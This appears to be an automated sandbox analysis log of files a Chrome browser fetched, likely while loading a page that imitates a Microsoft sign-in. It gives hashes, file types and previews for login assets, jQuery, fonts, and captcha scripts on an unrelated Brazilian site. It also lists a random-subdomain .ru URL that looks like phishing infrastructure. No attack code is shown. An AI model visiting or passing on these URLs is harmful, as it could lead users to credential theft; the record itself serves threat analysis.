                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):89501
                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                        Malicious:false
                                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:very short file (no magic)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:U:U
                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                        Malicious:false
                                                                                                        Preview:1
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 280x155, components 3
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):9972
                                                                                                        Entropy (8bit):7.895196249144156
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:mulX93w1AJH0GGUqxxQ93NP6UzGNfw/qhOeGYPNTfGh8BoXU/xR3nMUN:mwIAJUN3QlZ6KGNo/3MNf0MwU/x1nr
                                                                                                        MD5:EFD25EB7511F6AF1AFD64DFD208635DE
                                                                                                        SHA1:44405C293196EB095C65D1105C87ECB57446D201
                                                                                                        SHA-256:9393193BAA04B97F891DEC94C13082FAAB8A5E7E895C1A2B6922058A079A4961
                                                                                                        SHA-512:2F914334595E65A264E742D3D7C5FBE13B07BA432691C622DC18C39AED239D282FADE8CE9A0817064A1D9DE0AC9CF8FC2EDA88C8071E6E7009A6F5D09D962A10
                                                                                                        Malicious:false
                                                                                                        URL:https://fastly.picsum.photos/id/13/280/155.jpg?hmac=cHZfJPqHBsmeAvAhZneVIh61xpa9-HeBV7Edthv_G5k
                                                                                                        Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210................................0100........................................ASCII...Picsum ID: 13....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."..............................................................................;~'.....|..t.^.].4........D.1*.......X....dmHB`..H.<.O.o?..wl.......;...QD.w@.a.....t.&Acj.6.M..A..A..H...i8w.`.(..y.....P...N.N.N.N.N.gC123....X.......#Vy[./..2.31...D...4..f......^..'@.@.H.H.....%B.bd.1..+<.M.X...r..5i...7./\.4..<..N......E.].-YU.....KJ..MU.CP,.4.....>..$....V..>.Y.....Y.z.-j.#.....Xl.....Qk/.x....4.0nt.*;.`..Ud+0\K......=k77^...!.E.4'..YM-2.k:......yH....d.2........\g......k.j.....<.C.tVW...L....e..7.^y.6..^.<.c]#.]a.....K1P.-.-C....q.nJ.)u1V..>j|.x.5.6b..5"...]xAl..#E...L.&M..D..d.%.s.5..$..:..q.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1435
                                                                                                        Entropy (8bit):7.8613342322590265
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                        Malicious:false
                                                                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):116343
                                                                                                        Entropy (8bit):7.997640489040715
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                                                        MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                                                        SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                                                        SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                                                        SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                                                                        Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):89501
                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                        Malicious:false
                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                        Category:dropped
                                                                                                        Size (bytes):49911
                                                                                                        Entropy (8bit):7.994516776763163
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                        MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                        SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                        SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                        SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                        Malicious:false
                                                                                                        Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 74256, version 329.-17761
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):74256
                                                                                                        Entropy (8bit):7.996875020662388
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:3nUMyNUj53SHOhpTr+rqlyKPqdyTp9YMjmqbuOOiHggOI0zVX2H4aHDwXy5g/2Au:EJNUjdcsZqraPq8p9YMtbuOc20FBXy5t
                                                                                                        MD5:418DAD87601F9C8ABD0E5798C0DC1FEB
                                                                                                        SHA1:A6B003EF506E92D05CDE73ADF67487D7FD7EC6DF
                                                                                                        SHA-256:F18C486A80175CF02FEE0E05C2B4ACD86C04CDBAECEC61C1EF91F920509B5EFE
                                                                                                        SHA-512:99B9741F2A1C1D50E011C934C2445B07D9460F320EE60132B87D6594E9D91DBF3436849AE4745E29C58AD77846DA5AC3F3C5BEED8389CF8A8177C1E47F1AA8F6
                                                                                                        Malicious:false
                                                                                                        URL:https://use.fontawesome.com/releases/v5.8.1/webfonts/fa-solid-900.woff2
                                                                                                        Preview:wOF2......"........H..!..I......................?FFTM....`........D..;.6.$..,..0.. ..%..m[&A....._...Ve....-:.....'..m.j...x..zm.....oJ.2....$...Q[....n.Q.../.:..To&.a..C....f.|1;#...1..(i!k....../4...Zk......z...`0B)..t&2"2".!"....W..LF..FD&...>l6e.^P.o...O.P............e..*...~.\.y...".$xrK;..........$6.i..f.+.$*Q.JT.....=.!.@}Y+nu5O.9.o<.szI...Tl.:G..x$...>M.K/O6...Typuw....4.q\0.F.i...n.4.>.....>.n......16.V/...{..K...{=w....09@.....11....h...z..Ye6.o.Up...+.[E3.....E.b~...y....a.*...Q.]|Y...g..0...Mh...lhK.K...N.....W...Fk..,81...Z..<.q&.j3..-A.....9$B...w)...A`.....Ad.....m......Vj.l.=.....d...z....{).V..;.%`})9...B`.N.O.O..W9....3....N.9.oB.t,...1....i./J...x...,..i.T.U...w..9.f5..l.....F..X.JL.n.....I.}Y...1.h............I..0.....X.p..'...yE.R...:..K..v...r..).h.x"s.f.......@.X..p.z.9.{....Z...Cly.3...ese..b"..A.....>.}K..!.r...@.P.......x...?..{.=..4..1i...h.lk."......d.{i..I ..?.3.4{6rI.[.ZX.R.`....+..(..r.....!.^.x.>../.K.*]..j...@`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):3452
                                                                                                        Entropy (8bit):5.117912766689607
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                        MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                        SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                        SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                        SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                        Malicious:false
                                                                                                        URL:https://login.live.com/Me.htm?v=3
                                                                                                        Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):72
                                                                                                        Entropy (8bit):4.241202481433726
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                        Malicious:false
                                                                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:very short file (no magic)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):1
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:U:U
                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                        Malicious:false
                                                                                                        URL:https://fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru/XKjHZhHbfYmhpubsmCuWquMukLoqwWivhWWUUTDVQBBOGTVVEMNKETMCNBQCXCWPVJHFKSPUCKFSWACXRDK
                                                                                                        Preview:1
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):122515
                                                                                                        Entropy (8bit):7.997419459076181
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                                                        MD5:AC9A6ED508328361A4C9530325A94076
                                                                                                        SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                                                        SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                                                        SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                                                        Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:assembler source, ASCII text
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):3902
                                                                                                        Entropy (8bit):4.845494191118953
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:UqDqZdykc0s7nPzbB9C/2oBR2ZFMD0E05zIrT+0gYmVR3n8L9FkV9x1PhMx6xzO2:Uq+j387nrb6/2DMUVG/269FkZihip
                                                                                                        MD5:91E4D58F7D19BC9866837198AC3EDA0C
                                                                                                        SHA1:BE586630323B55D3986E6F619A09A5A18DFB30E9
                                                                                                        SHA-256:77C9816AF1AC8D570835912C05BCCC2737FB93CC52577F227EFA85DF424BE323
                                                                                                        SHA-512:9FCA6BC78334C01B38B5D919C14C9974C5F0BEF3BA104FD0170F624DDD53786EDCA4A2DCA0D5D7D5631217CB83C0B9F83BB06BA2CBC3AD30AC2DA244A1BC1655
                                                                                                        Malicious:false
                                                                                                        URL:https://plasticoscorrea.com.br/script/disk/slidercaptcha.css
                                                                                                        Preview:body {. overflow-x: hidden;. overflow-y: hidden;. margin: 0;. height: 100vh;. display: flex;. flex-direction: column;. align-items: center;. justify-content: center;. background-color: #f8f9fa;. font-family: ui-sans-serif, system-ui, -apple-system, BlinkMacSystemFont,. Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif,. Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji;.}...block {. position: absolute;. left: 0;. top: 0;.}...card {. display: flex;. flex-direction: column;. min-width: 0;. word-wrap: break-word;. background-clip: border-box;. border: 1px solid rgba(0,0,0,.125);.}...card-header {. padding: .75rem 1.25rem;. margin-bottom: 0;. background-color: rgba(0,0,0,.03);. border-bottom: 1px solid rgba(0,0,0,.125);. text-align: center;. font-size: 11px;.}...card-header:first-child {. border-radius: calc(.25rem - 1px) calc(.25rem - 1px) 0 0;.}...card-body {. fl
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:Unicode text, UTF-8 text
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):13665
                                                                                                        Entropy (8bit):4.492668383410837
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:KBk+P8F+qCyuQRoINig6rjjUQvETLyx+YwCk/h66lbEggK6Kd9KAZjg:KXe+aW2QwD/hJbbm
                                                                                                        MD5:4771A363CA048FD050F7E4BBFAD9997B
                                                                                                        SHA1:33CCEA4DE0B606C55495356E8EF19C4EB03170FD
                                                                                                        SHA-256:B6F7D8953D08295BE7C41392B47B22C86F6CED404CA7AB0C674608F74D87E583
                                                                                                        SHA-512:E2E48AF45B75C44843E558B1C53F1C3173BF2E354924DFBECAD8C08804A367BEF60E355A30D7F7D00FA7B9B450F5A6177B65339716077167D941BDCC45D20CEB
                                                                                                        Malicious:false
                                                                                                        URL:https://plasticoscorrea.com.br/script/disk/longbow.slidercaptcha.js
                                                                                                        Preview:(function () {. 'use strict';.. var extend = function () {. var length = arguments.length;. var target = arguments[0] || {};. if (typeof target != "object" && typeof target != "function") {. target = {};. }. if (length == 1) {. target = this;. i--;. }. for (var i = 1; i < length; i++) {. var source = arguments[i];. for (var key in source) {. if (Object.prototype.hasOwnProperty.call(source, key)) {. target[key] = source[key];. }. }. }. return target;. }.. var isFunction = function isFunction(obj) {. return typeof obj === "function" && typeof obj.nodeType !== "number";. };.. var SliderCaptcha = function (element, options) {. this.$element = element;. this.options = extend({}, SliderCaptcha.DEFAULTS, options);. this.$element.style.position = 'relative';. this.$e
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):621
                                                                                                        Entropy (8bit):7.673946009263606
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
